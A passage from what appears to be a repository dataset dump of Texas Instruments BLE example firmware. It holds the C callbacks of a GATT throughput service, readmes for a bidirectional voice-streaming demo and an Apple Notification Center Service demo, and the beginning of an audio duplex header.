Characteristic Declaration\n {\n { ATT_BT_UUID_SIZE, characterUUID },\n GATT_PERMIT_READ,\n 0,\n &Throughput_Service_Toggle_ThroughputProps\n },\n // Toggle_Throughput Characteristic Value\n {\n { ATT_UUID_SIZE, Throughput_Service_Toggle_ThroughputUUID },\n GATT_PERMIT_READ | GATT_PERMIT_WRITE,\n 0,\n Throughput_Service_Toggle_ThroughputVal\n },\n};\n\n/*********************************************************************\n * LOCAL FUNCTIONS\n */\nstatic bStatus_t Throughput_Service_ReadAttrCB( uint16 connHandle, gattAttribute_t *pAttr,\n uint8 *pValue, uint16 *pLen, uint16 offset,\n uint16 maxLen, uint8 method );\nstatic bStatus_t Throughput_Service_WriteAttrCB( uint16 connHandle, gattAttribute_t *pAttr,\n uint8 *pValue, uint16 len, uint16 offset,\n uint8 method );\n\n/*********************************************************************\n * PROFILE CALLBACKS\n */\n// Simple Profile Service Callbacks\nCONST gattServiceCBs_t Throughput_ServiceCBs =\n{\n Throughput_Service_ReadAttrCB, // Read callback function pointer\n Throughput_Service_WriteAttrCB, // Write callback function pointer\n NULL // Authorization callback function pointer\n};\n\n/*********************************************************************\n* PUBLIC FUNCTIONS\n*/\n\n/*\n * Throughput_Service_AddService- Initializes the Throughput_Service service by registering\n * GATT attributes with the GATT server.\n *\n */\nbStatus_t Throughput_Service_AddService( void )\n{\n uint8_t status;\n\n // Register GATT 
attribute list and CBs with GATT Server App\n status = GATTServApp_RegisterService( Throughput_ServiceAttrTbl,\n GATT_NUM_ATTRS( Throughput_ServiceAttrTbl ),\n GATT_MAX_ENCRYPT_KEY_SIZE,\n &Throughput_ServiceCBs );\n\n return ( status );\n}\n\n/*\n * Throughput_Service_RegisterAppCBs - Registers the application callback function.\n * Only call this function once.\n *\n * appCallbacks - pointer to application callbacks.\n */\nbStatus_t Throughput_Service_RegisterAppCBs( Throughput_ServiceCBs_t *appCallbacks )\n{\n if ( appCallbacks )\n {\n pAppCBs = appCallbacks;\n\n return ( SUCCESS );\n }\n else\n {\n return ( bleAlreadyInRequestedMode );\n }\n}\n\n/*\n * Throughput_Service_SetParameter - Set a Throughput_Service parameter.\n *\n * param - Profile parameter ID\n * len - length of data to write\n * value - pointer to data to write. This is dependent on\n * the parameter ID and WILL be cast to the appropriate\n * data type (example: data type of uint16 will be cast to\n * uint16 pointer).\n */\nbStatus_t Throughput_Service_SetParameter( uint8 param, uint8 len, void *value )\n{\n bStatus_t ret = SUCCESS;\n switch ( param )\n {\n case THROUGHPUT_SERVICE_UPDATE_PDU:\n if ( len == THROUGHPUT_SERVICE_UPDATE_PDU_LEN )\n {\n memcpy(Throughput_Service_Update_PDUVal, value, len);\n }\n else\n {\n ret = bleInvalidRange;\n }\n break;\n\n case THROUGHPUT_SERVICE_UPDATE_PHY:\n if ( len == THROUGHPUT_SERVICE_UPDATE_PHY_LEN )\n {\n memcpy(Throughput_Service_Update_PHYVal, value, len);\n }\n else\n {\n ret = bleInvalidRange;\n }\n break;\n\n case THROUGHPUT_SERVICE_TOGGLE_THROUGHPUT:\n if ( len == THROUGHPUT_SERVICE_TOGGLE_THROUGHPUT_LEN )\n {\n memcpy(Throughput_Service_Toggle_ThroughputVal, value, len);\n }\n else\n {\n ret = bleInvalidRange;\n }\n break;\n\n default:\n ret = INVALIDPARAMETER;\n break;\n }\n return ret;\n}\n\n\n/*\n * Throughput_Service_GetParameter - Get a Throughput_Service parameter.\n *\n * param - Profile parameter ID\n * value - pointer to data to write. 
\n/*\n * Throughput_Service_GetParameter - Get a Throughput_Service parameter.\n *\n * param - Profile parameter ID\n * value - pointer to the buffer the parameter value is copied into. This is dependent on\n * the parameter ID and WILL be cast to the appropriate\n * data type (example: data type of uint16 will be cast to\n * uint16 pointer).\n */\nbStatus_t Throughput_Service_GetParameter( uint8 param, void *value )\n{\n bStatus_t ret = SUCCESS;\n switch ( param )\n {\n case THROUGHPUT_SERVICE_UPDATE_PDU:\n memcpy(value, Throughput_Service_Update_PDUVal, THROUGHPUT_SERVICE_UPDATE_PDU_LEN);\n break;\n\n case THROUGHPUT_SERVICE_UPDATE_PHY:\n memcpy(value, Throughput_Service_Update_PHYVal, THROUGHPUT_SERVICE_UPDATE_PHY_LEN);\n break;\n\n case THROUGHPUT_SERVICE_TOGGLE_THROUGHPUT:\n memcpy(value, Throughput_Service_Toggle_ThroughputVal, THROUGHPUT_SERVICE_TOGGLE_THROUGHPUT_LEN);\n break;\n\n default:\n ret = INVALIDPARAMETER;\n break;\n }\n return ret;\n}\n\n\n/*********************************************************************\n * @fn Throughput_Service_ReadAttrCB\n *\n * @brief Read an attribute.\n *\n * @param connHandle - connection message was received on\n * @param pAttr - pointer to attribute\n * @param pValue - pointer to data to be read\n * @param pLen - length of data to be read\n * @param offset - offset of the first octet to be read\n * @param maxLen - maximum length of data to be read\n * @param method - type of read message\n *\n * @return SUCCESS, blePending or Failure\n */\nstatic bStatus_t Throughput_Service_ReadAttrCB( uint16 connHandle, gattAttribute_t *pAttr,\n uint8 *pValue, uint16 *pLen, uint16 offset,\n uint16 maxLen, uint8 method )\n{\n bStatus_t status = SUCCESS;\n\n // See if request is regarding the Update_PDU Characteristic Value\n if ( ! memcmp(pAttr->type.uuid, Throughput_Service_Update_PDUUUID, pAttr->type.len) )\n {\n if ( offset > THROUGHPUT_SERVICE_UPDATE_PDU_LEN ) // Prevent malicious ATT ReadBlob offsets.\n {\n status = ATT_ERR_INVALID_OFFSET;\n }\n else\n {\n *pLen = MIN(maxLen, THROUGHPUT_SERVICE_UPDATE_PDU_LEN - offset); // Transmit as much as possible\n memcpy(pValue, pAttr->pValue + offset, *pLen);\n }\n }\n // See if request is regarding the Update_PHY Characteristic Value\n else if ( ! memcmp(pAttr->type.uuid, Throughput_Service_Update_PHYUUID, pAttr->type.len) )\n {\n if ( offset > THROUGHPUT_SERVICE_UPDATE_PHY_LEN ) // Prevent malicious ATT ReadBlob offsets.\n {\n status = ATT_ERR_INVALID_OFFSET;\n }\n else\n {\n *pLen = MIN(maxLen, THROUGHPUT_SERVICE_UPDATE_PHY_LEN - offset); // Transmit as much as possible\n memcpy(pValue, pAttr->pValue + offset, *pLen);\n }\n }\n // See if request is regarding the Toggle_Throughput Characteristic Value\n else if ( ! 
memcmp(pAttr->type.uuid, Throughput_Service_Toggle_ThroughputUUID, pAttr->type.len) )\n {\n if ( offset > THROUGHPUT_SERVICE_TOGGLE_THROUGHPUT_LEN ) // Prevent malicious ATT ReadBlob offsets.\n {\n status = ATT_ERR_INVALID_OFFSET;\n }\n else\n {\n *pLen = MIN(maxLen, THROUGHPUT_SERVICE_TOGGLE_THROUGHPUT_LEN - offset); // Transmit as much as possible\n memcpy(pValue, pAttr->pValue + offset, *pLen);\n }\n }\n else\n {\n // If we get here, that means you've forgotten to add an if clause for a\n // characteristic value attribute in the attribute table that has READ permissions.\n *pLen = 0;\n status = ATT_ERR_ATTR_NOT_FOUND;\n }\n\n return status;\n}\n\n\n/*********************************************************************\n * @fn Throughput_Service_WriteAttrCB\n *\n * @brief Validate attribute data prior to a write operation\n *\n * @param connHandle - connection message was received on\n * @param pAttr - pointer to attribute\n * @param pValue - pointer to data to be written\n * @param len - length of data\n * @param offset - offset of the first octet to be written\n * @param method - type of write message\n *\n * @return SUCCESS, blePending or Failure\n */\nstatic bStatus_t Throughput_Service_WriteAttrCB( uint16 connHandle, gattAttribute_t *pAttr,\n uint8 *pValue, uint16 len, uint16 offset,\n uint8 method )\n{\n bStatus_t status = SUCCESS;\n uint8_t paramID = 0xFF;\n\n // See if request is regarding a Client Characterisic Configuration\n if ( ! memcmp(pAttr->type.uuid, clientCharCfgUUID, pAttr->type.len) )\n {\n // Allow only notifications.\n status = GATTServApp_ProcessCCCWriteReq( connHandle, pAttr, pValue, len,\n offset, GATT_CLIENT_CFG_NOTIFY);\n }\n // See if request is regarding the Update_PDU Characteristic Value\n else if ( ! memcmp(pAttr->type.uuid, Throughput_Service_Update_PDUUUID, pAttr->type.len) )\n {\n if ( offset + len > THROUGHPUT_SERVICE_UPDATE_PDU_LEN )\n {\n status = ATT_ERR_INVALID_OFFSET;\n }\n else\n {\n // Copy pValue into the variable we point to from the attribute table.\n memcpy(pAttr->pValue + offset, pValue, len);\n\n // Only notify application if entire expected value is written\n if ( offset + len == THROUGHPUT_SERVICE_UPDATE_PDU_LEN)\n paramID = THROUGHPUT_SERVICE_UPDATE_PDU;\n }\n }\n // See if request is regarding the Update_PHY Characteristic Value\n else if ( ! memcmp(pAttr->type.uuid, Throughput_Service_Update_PHYUUID, pAttr->type.len) )\n {\n if ( offset + len > THROUGHPUT_SERVICE_UPDATE_PHY_LEN )\n {\n status = ATT_ERR_INVALID_OFFSET;\n }\n else\n {\n // Copy pValue into the variable we point to from the attribute table.\n memcpy(pAttr->pValue + offset, pValue, len);\n\n // Only notify application if entire expected value is written\n if ( offset + len == THROUGHPUT_SERVICE_UPDATE_PHY_LEN)\n paramID = THROUGHPUT_SERVICE_UPDATE_PHY;\n }\n }\n // See if request is regarding the Toggle_Throughput Characteristic Value\n else if ( ! 
memcmp(pAttr->type.uuid, Throughput_Service_Toggle_ThroughputUUID, pAttr->type.len) )\n {\n if ( offset + len > THROUGHPUT_SERVICE_TOGGLE_THROUGHPUT_LEN )\n {\n status = ATT_ERR_INVALID_OFFSET;\n }\n else\n {\n // Copy pValue into the variable we point to from the attribute table.\n memcpy(pAttr->pValue + offset, pValue, len);\n\n // Only notify application if entire expected value is written\n if ( offset + len == THROUGHPUT_SERVICE_TOGGLE_THROUGHPUT_LEN)\n paramID = THROUGHPUT_SERVICE_TOGGLE_THROUGHPUT;\n }\n }\n else\n {\n // If we get here, that means you've forgotten to add an if clause for a\n // characteristic value attribute in the attribute table that has WRITE permissions.\n status = ATT_ERR_ATTR_NOT_FOUND;\n }\n\n // Let the application know something changed (if it did) by using the\n // callback it registered earlier (if it did).\n if (paramID != 0xFF)\n if ( pAppCBs && pAppCBs->pfnChangeCb )\n pAppCBs->pfnChangeCb( paramID ); // Call app function from stack task context.\n\n return status;\n}\n"
},
{
"alpha_fraction": 0.7211760878562927,
"alphanum_fraction": 0.7398414015769958,
"avg_line_length": 32.263736724853516,
"blob_id": "d1ab2e0279d3c80294a2bf81b904826fd767bf5b",
"content_id": "2d297fdc654581d258d9684280723b8d7d3393da",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 6054,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 182,
"path": "/examples/rtos/CC2640R2_LAUNCHXL/bleapps/simple_central_bidirectional_audio/readme.md",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "Purpose / Scope\n===============\n\nThis page will document how to demonstrate an end to end full duplex BLE\nvoice/audio solution using two CC26xx devices.\nEmphasis will be placed on the central device which is responsible for\nestablishing the connection.\n\nVoice data is transferred over BLE using the TI audio\\_profile\\_dle which is a\nVoice Over GATT Profile (VoGP) design. This profile has been augmented to use\ndata length extension and large MTU.\n\nThe TI audio\\_profile\\_dle has been updated to add an additional start byte.\nThis new start byte indicates that the following stream uses mSBC compression.\n\nIn this demo, data flows bidirectionally between a streamer (GATT server) and a\nreceiver (GATT client) device. This means both devices must act as both a GATT\nclient and a GATT server.\n\nThe `simple_central_bidirectional_audio` project is a modified version of\n`simple_central` from the BLE-SDK.\n\nThe central project was slightly modified to:\n\n - Automatically connect to the audio peripheral based on the peripheral's\n advertisement data.\n - Transmit and receive voice streams using the TI VoGP audio\\_profile\\_dle\n - Encode a voice stream from a microphone on the CC3200AUDBOOST.\n - Decode a voice stream and output to headphone/line out on CC3200AUDBOOST.\n - Stream audio data with IMA-ADPCM or mSBC codec using the Data Length\n Extension feature\n\nStreaming Voice over BLE\n========================\n\nFor more information about the technical details of TI's *Voice Over BLE* Solution\nplease see the Software Developer's Guide. Note that the audio profile used in\nthis example is slightly modified to use Data Length extension and large MTU.\n[BLE-Stack User's Guide, see Voice Section](http://software-dl.ti.com/lprf/blestack-latest/).\n\nSome quick facts about voice over BLE:\n\n - `CC3200AUDBOOST BoosterPack`\n - Sample rate: `16kHz`\n - Bit Depth: `16 bits`\n - Compression mechanism: `4:1 IMA-ADPCM` or `mSBC`\n - Required application throughput: `66.67kbps` or `60.8kpbs`\n - Voice quality (IMA-ADPCM) has been qualified by Nuance and is sufficient for\n voice recognition solutions\n\n_Note: The files in source/ti/audiocodec are used as the control interface to\nthe TLV320AIC3254 on the CC3200AUDBOOST. The software codecs responsible for\ncompression and decompression are found in the following locations:_\n - MSBC: source/third_party/sbc (of this repo)\n - ADPCM: source/ti/drivers/pdm (of the SDK install)\n\nRuntime Buffer Management\n=========================\n\nDuring normal operation the instruction cache is enabled.\n\nWhen bidirectional streaming begins, the cache is disabled and is temporarily used\nas RAM for I2S buffers. Once the stream stops, the instruction cache is re-enabled.\n\nThis offers significant power consumption improvements over a `CACHE_AS_RAM`\nconfiguration.\n\nUpon a disconnect, the `osal_snv` module within the stack will trigger a\ncompaction if necessary. The `OSAL_SNV=1` (one page SNV) will use the cache for\nthis. 
\nRuntime Buffer Management\n=========================\n\nDuring normal operation the instruction cache is enabled.\n\nWhen bidirectional streaming begins, the cache is disabled and is temporarily used\nas RAM for I2S buffers. Once the stream stops, the instruction cache is re-enabled.\n\nThis offers significant power consumption improvements over a `CACHE_AS_RAM`\nconfiguration.\n\nUpon a disconnect, the `osal_snv` module within the stack will trigger a\ncompaction if necessary. The `OSAL_SNV=1` (one page SNV) configuration will use\nthe cache for this. In order to prevent potential memory corruption during\ncompaction and the cleanup of an I2S stream, **the OSAL_SNV=2 or OSAL_SNV=0\nconfigurations are recommended**.\n\nPrerequisites\n=============\n\n#### Hardware Requirements\n\nBefore running the demo, the user will need the following components:\n\n- Two voice-enabled development kits: CC2640R2 LaunchPad with CC3200AUDBOOST\n - [CC2640R2 LaunchPad](http://www.ti.com/tool/launchxl-cc2640r2)\n - [CC3200AUDBOOST](http://www.ti.com/tool/cc3200audboost)\n- Two sets of headphones\n\n_Note: Apple headphones will not work with the CC3200 BoosterPack_\n\n#### Firmware Requirements\n\n1. Load the peripheral device with the `simple_peripheral_bidirectional_audio`\n project\n1. Load the central device with the `simple_central_bidirectional_audio`\n project\n\n\nRunning the Demo\n================\n\n#### Hardware Setup\n\n - Seat the `CC3200AUDBOOST` on the `CC2640R2_LAUNCHXL` as shown in the photo\n below\n - Attach a compatible set of headphones to the `LINE OUT` connector on the\n `CC3200AUDBOOST`\n\n\n\n#### Full Duplex Bidirectional Voice Streaming on the CC2640R2\n\nAfter building the firmware required for the central and peripheral, you are\nready to demo the voice capabilities of the CC2640R2.\n\n1. Power up the peripheral LaunchPad\n * If the serial port is attached it will log\n ```\n Audio Tx Peripheral with DLE\n <BD_ADDR>\n Initialized\n Advertising\n ```\n\n2. Power up the central device\n * If the serial port is attached it will log\n ```\n Audio Central with DLE\n <BD_ADDR>\n Initialized\n Idle...\n\n ```\n3. Start Discovery on the central device by pressing the left key on the LaunchPad.\n * The Central device will scan the peripheral's advertisement data for the\n AUDIO\\_SERV\\_UUID (Audio Profile).\n * After finding devices that list these services, their advertisement payloads\n will be scanned for the device name:\n\n ```c\n static uint8 remoteNameTx[] =\n {\n 'S', 'i', 'm', 'p', 'l', 'e',\n 'B', 'L', 'E',\n 'A', 'u', 'd', 'i', 'o', 'T', 'x',\n };\n ```\n4. If an acceptable voice streaming device is found (CC2640R2LP with the correct\n name and audio profile), the central will connect to the device.\n If attached, the serial port will log:\n\n * Audio Central\n ```\n Audio Central with DLE\n <BD_ADDR>\n Initialized\n Idle...\n Discovering...\n Connected\n <PEER_BD_ADDR>\n MTU_EXCHANGE_RSP 103\n ```\n * Audio Peripheral\n ```\n Connected\n <PEER_BD_ADDR>\n ```\n5. The devices are now ready to stream voice over BLE.\n * Press the right button on the peripheral device to start streaming with\n ADPCM compression.\n * Press the left button on the peripheral device to start streaming with mSBC\n compression.\n\nDemo LED states\n===============\n\nThe following states of the device are indicated by the red and green LEDs\non the LaunchPad.\n* Idle + bonds forgotten: Red LED is on, solid\n* Scanning for devices: Green LED is flashing\n* Device connected: Green LED is on, solid\n\nReferences\n==========\n * [BLE-Stack User's Guide, see Voice Section](http://software-dl.ti.com/lprf/blestack-latest/)\n"
},
{
"alpha_fraction": 0.7542765140533447,
"alphanum_fraction": 0.7644395232200623,
"avg_line_length": 40.06611633300781,
"blob_id": "6baffb7524b9a3bad4a5c7a75d2aeefb4f0051fa",
"content_id": "6e69542f56008590fb319f3d7a869dd439f10931",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 9938,
"license_type": "no_license",
"max_line_length": 219,
"num_lines": 242,
"path": "/examples/rtos/CC2640R2_LAUNCHXL/bleapps/ancs/readme.md",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "ANCS Demo\n=========\n\n## Table of Contents\n\n* [**Introduction**](#Introduction)\n* [**Hardware Prerequisites**](#hardware-prerequisites)\n* [**Software Prerequisites**](#software-prerequisites)\n* [**Preprocessor Defines**](#preprocessor-defines)\n * [**USE\\_GUI\\_COMPOSER**](#use_gui_composer)\n * [**USE\\_WATCHDOG\\_TIMER**](#use_watchdog_timer)\n * [**IGNORE\\_PREEXISTING\\_NOTIFICATIONS**](#ignore_preexisting_notifications)\n* [**Usage**](#Usage)\n * [**GUI Composer Demonstration**](#gui_composer_demonstration)\n * [**UART Demonstration**](#uart-demonstration)\n\n## Introduction\n\nThe ANCS project implements a simple Bluetooth low energy\nperipheral device acting as a GATT client which receives Apple notification data\nfrom a mobile Apple device acting as a GATT server. This project is meant to\ndemonstrate a basic use of the Apple Notification Center Service or ANCS, and\ncan be adapted for use in a variety personal electronic applications. The ANCS's\nspecification can be found here:\n[**Apple Notification Center Service (ANCS) Specification**](https://developer.apple.com/library/content/documentation/CoreBluetooth/Reference/AppleNotificationCenterServiceSpecification/Introduction/Introduction.html).\n\nThis project uses stack and app configurations that are summarized in the table\nbelow:\n\nApp Build Configuration | Compatible Stack Configuration | Description\n-----------------------------|----------------------------------|-------------------------------------------------------------------\n`FlashROM_StackLibrary` | `FlashROM_Library` | Application build configuration linked to Stack library (fully executable)\n\n## Hardware Prerequisites\n\nThe default ANCS Demo configuration uses the\n[**LAUNCHXL-CC2640R2**](http://www.ti.com/tool/launchxl-cc2640r2). This hardware\nconfiguration is shown in the below image:\n\n\n\nFor custom hardware, see the Running the SDK on Custom Boards section of the\n[**Bluetooth 4.2 Software User's Guide for CC2640R2F**](http://software-dl.ti.com/lprf/blestack-latest/).\n\nThis application also requires a mobile Apple device running iOS that supports\nBluetooth 4.2.\n\n## Software Prerequisites\n\nThis project requires either the [**companion GUI Composer application**](https://dev.ti.com/gallery/)\n or a serial terminal application such as [**PuTTY**](http://www.putty.org/)\n or [**Tera Term**](https://ttssh2.osdn.jp/index.html.en) for its demonstrations.\n\nFor information on what versions of Code Composer Studio and IAR Embedded\nWorkbench to use, see the Release Notes located in the docs/blestack folder. For\ninformation on how to import this project into your IDE workspace and\nbuild/run, please refer to the CC2640R2F Platform section in the\n [**Bluetooth 4.2 Software User's Guide for CC2640R2F**](http://software-dl.ti.com/lprf/blestack-latest/).\n\n## Preprocessor Defines\n\nThis application has optional functionality toggled in the form of preprocessor\ndefines. See the BLE-Stack User's guide section for your selected IDE (IAR, CCS)\nfor more info on how to modify the preprocessor defines\n [**Bluetooth 4.2 Software User's Guide for CC2640R2F**](http://software-dl.ti.com/lprf/blestack-latest/).\n\n#### USE\\_GUI\\_COMPOSER\n\nThis symbol determines which demonstration mode the application is in.\nIf USE\\_GUI\\_COMPOSER is defined, the project will support the\n[GUI Composer 2.0 demonstration](#gui_composer_demonstration). 
\n#### USE\\_WATCHDOG\\_TIMER\n\nThis symbol determines if a watchdog timer (WDT) is enabled in the application.\nThe WDT is enabled when `USE_WATCHDOG_TIMER` is defined, and disabled when the\nsymbol is undefined. The WDT is set to start counting down once the CC2640R2 is\nadvertising. The WDT is configured to wait five seconds before being kicked, and\nthe periodic task resetting the WDT will trigger every half-second. Both of\nthese values can be changed by adjusting `WATCHDOG_TIMER_TIMEOUT_PERIOD` and\n `ANCSAPP_PERIODIC_EVT_PERIOD` found at the top of ancs_app.c, respectively.\n\nBy default `USE_WATCHDOG_TIMER` is undefined.\n\n\n#### IGNORE\\_PREEXISTING\\_NOTIFICATIONS\n\nThis symbol determines if the application should include notifications\nthat exist on the mobile Apple device before the session with the CC2640R2 was\ninitiated. Such notifications are ignored if `IGNORE_PREEXISTING_NOTIFICATIONS`\nis defined; conversely, preexisting notifications will be processed by the\napplication if the symbol is undefined.\n\nBy default `IGNORE_PREEXISTING_NOTIFICATIONS` is undefined.\n\n## Usage\n\nThis application has two primary modes of usage: a GUI Composer 2.0\ndemonstration or a UART terminal demonstration.\n\nFor both demonstrations, this document will use an iPhone 6 Plus to serve as the\nmobile Apple device hosting the ANCS. Note that any mobile Apple device that\nsupports Bluetooth 4.2 should work accordingly.\n\n### GUI Composer Demonstration\n\nThe GUI Composer 2.0 partner application can be accessed\n[**here**](https://dev.ti.com/gallery/). Simply search through the list of\napplications featured in the gallery for one titled **ANCS Demo**. Import the\nproject into GUI Composer.\n\n\n\nIt may be required to import the ANCS project into GUI Composer to change the\nCOM port used by the GUI Composer application; see the screenshot below for\nsteps.\n\n\n\nNow the GUI Composer application is configured to use the correct COM port.\nClick the play button to run. You should now be presented with this page:\n\n\n\nYou may click **CLOSE** on the README.md window, and wait until the prompt\nin the bottom left of the application reads **waiting for data...** as seen in\nthe above picture.\n\nAdvertising is enabled by default upon startup, so\nthere is no need to physically press a button to start advertising. Unlock the\nmobile Apple device and open the Settings App. Open the Bluetooth settings tab\nand notice that \"ANCS Demo\" can now be connected to:\n\n\n\nNext, a prompt asking to pair to \"ANCS Demo\" should appear on the mobile Apple device:\n\n\n\nTap \"Pair\" and the mobile Apple device should complete the bonding process with\nthe ANCS Demo. The \"ANCS Demo\" should now appear with an \"i\" encompassed by a\ncircle signifying stored bond data:\n\n\n\nThe GUI application should now be displaying various notification data as it is\nretrieved:\n\n\n\nOnce notification data is no longer being retrieved for the existing\nnotifications, you may view retrieved notifications by selecting them in the\ndrop-down list titled **Select Notification:**\n\n\n\nIf the mobile Apple device receives an incoming call, you may accept or decline\nthe call using the CC2640R2's right (Accept) and left (Decline) buttons. 
This\nis an image of the GUI application after accepting an incoming call:\n\n\n\n**Note:** If the mobile Apple device generates any new notifications, the ANCS\nDemo will automatically retrieve the notification's data and display it\naccordingly.\n\n\n## UART Demonstration\n\n\nThis document will use PuTTY to serve as the display for the output of the\nCC2640R2 LaunchPad for the UART demonstration. Note that any other serial\nterminal application can be used. The following default parameters are used\n for the UART peripheral for display:\n\n UART Param |Default Value\n -------------- |----------------\n Baud Rate |115200\n Data length |8 bits\n Parity |None\n Stop bits |1 bit\n Flow Control |None\n\nOnce the ANCS Demo application starts, the output to the terminal\nwill report its address and the fact that it is advertising, as shown below:\n\n\n\nAdvertising is enabled by default upon startup, so there is no need to\nphysically press a button to start advertising. Unlock the mobile Apple device\nand open the Settings App. Open the Bluetooth settings tab and notice that\n\"ANCS Demo\" can now be connected to:\n\n\n\nTap \"ANCS Demo\" to connect to it. The terminal will now display \"Connected\" and\nthe address of the connected mobile Apple device as seen below:\n\n\n\nBack on the mobile Apple device, a prompt asking to pair to \"ANCS Demo\" should\nappear:\n\n\n\nTap \"Pair\" and the mobile Apple device should complete the bonding process with\nthe ANCS Demo. The \"ANCS Demo\" should now appear with an \"i\" encompassed by a\ncircle signifying stored bond data:\n\n\n\nBack on the terminal, a stream of notification data should begin to be displayed.\nThese notifications can be found in the mobile Apple device's Notification\nCenter.\nWith each notification, seven articles of data will be displayed:\n\n1. The number of notifications left to be processed\n2. The category of the notification\n3. The ID of the iOS application producing the notification\n4. The display name of the iOS application\n5. The title of the notification\n6. The message of the notification\n7. The date and time the notification was created\n\n\n\nAdditionally, if the mobile Apple device receives an incoming call, the call\ncan be declined by pressing the button on the right side of the device.\nAlternatively, the call can be accepted by pressing the button on the left\nside of the device.\n\nThis is an example UART output of a call being declined:\n\n\n\n**Note:** If the mobile Apple device generates any new notifications, the ANCS\nDemo will automatically retrieve the notification's data and display it\naccordingly.\n"
},
{
"alpha_fraction": 0.5883417725563049,
"alphanum_fraction": 0.5994448661804199,
"avg_line_length": 31.494117736816406,
"blob_id": "89e023824ada78e27fea337e452aa8094af1f23e",
"content_id": "eaedbe0d471a2e8f34fe27f475624f5351d3ef37",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 8286,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 255,
"path": "/source/ti/blestack/profiles/audio_dle/audio_duplex.h",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "/*\n * Filename: audio_duplex.h\n *\n * Description: Implements bidirectional VoGP audio/voice communication\n * This module connects data from the user application task(buttons),\n * data from the I2S driver (local audio frames), and data from the\n * BLE-Stack Audio Profile (incoming audio frames).\n *\n * Calls to this module run in the application task context. A callback\n * must be plugged for the module to handle higher priority CBs such as\n * Audio data and I2S callbacks\n *\n * Copyright (C) 2016 Texas Instruments Incorporated - http://www.ti.com/\n *\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions\n * are met:\n *\n * Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n *\n * Redistributions in binary form must reproduce the above copyright\n * notice, this list of conditions and the following disclaimer in the\n * documentation and/or other materials provided with the\n * distribution.\n *\n * Neither the name of Texas Instruments Incorporated nor the names of\n * its contributors may be used to endorse or promote products derived\n * from this software without specific prior written permission.\n *\n * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n * \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n *\n */\n\n#ifndef AUDIO_DUPLEX_H\n#define AUDIO_DUPLEX_H\n\n#ifdef __cplusplus\nextern \"C\"\n{\n#endif\n\n/*********************************************************************\n * CONSTANTS\n */\n\n#define AUDIO_DUPLEX_SUCCESS 0\n#define AUDIO_MEM_FAIL -1\n#define AUDIO_HW_FAIL -2\n#define AUDIO_INVALID_PARAMS -3\n\n#define AUDIO_DUPLEX_I2S_FRAME_EVENT 0x01\n#define AUDIO_DUPLEX_I2S_ERROR_EVENT 0x02\n#define AUDIO_DUPLEX_SEND_STOP_CMD_EVENT 0x04\n#define AUDIO_DUPLEX_SEND_START_CMD_EVENT 0x08\n#define AUDIO_DUPLEX_STOP_I2S_EVENT 0x10\n#define AUDIO_DUPLEX_START_I2S_EVENT 0x20\n\n#define AUDIO_DUPLEX_CMD_STOP 0x00\n#define AUDIO_DUPLEX_CMD_START 0x04\n#define AUDIO_DUPLEX_CMD_START_MSBC 0x05\n#define AUDIO_DUPLEX_CMD_NONE 0xFF\n\n#define AUDIO_DUPLEX_STREAM_TYPE_NONE AUDIO_DUPLEX_CMD_STOP\n#define AUDIO_DUPLEX_STREAM_TYPE_ADPCM AUDIO_DUPLEX_CMD_START\n#define AUDIO_DUPLEX_STREAM_TYPE_MSBC AUDIO_DUPLEX_CMD_START_MSBC\n\n#define AUDIO_DUPLEX_VOLUME_UP 0x01\n#define AUDIO_DUPLEX_VOLUME_DOWN 0xFF\n\n#define AUDIO_DUPLEX_INPUT_OPTION AUDIO_CODEC_MIC_ONBOARD\n#define AUDIO_DUPLEX_OUTPUT_OPTION AUDIO_CODEC_SPEAKER_HP\n#define AUDIO_DUPLEX_MAX_VOLUME 75\n\n\n#define AUDIO_DUPLEX_BUFSIZE_ADPCM 96\n#define AUDIO_DUPLEX_HDRSIZE_ADPCM 4\n\n#define AUDIO_DUPLEX_ADPCM_SAMPLES_PER_FRAME AUDIO_DUPLEX_BUFSIZE_ADPCM\n\n#define AUDIO_DUPLEX_MSBC_SAMPLES_PER_FRAME 120\n#define AUDIO_DUPLEX_HDRSIZE_MSBC 1\n#define 
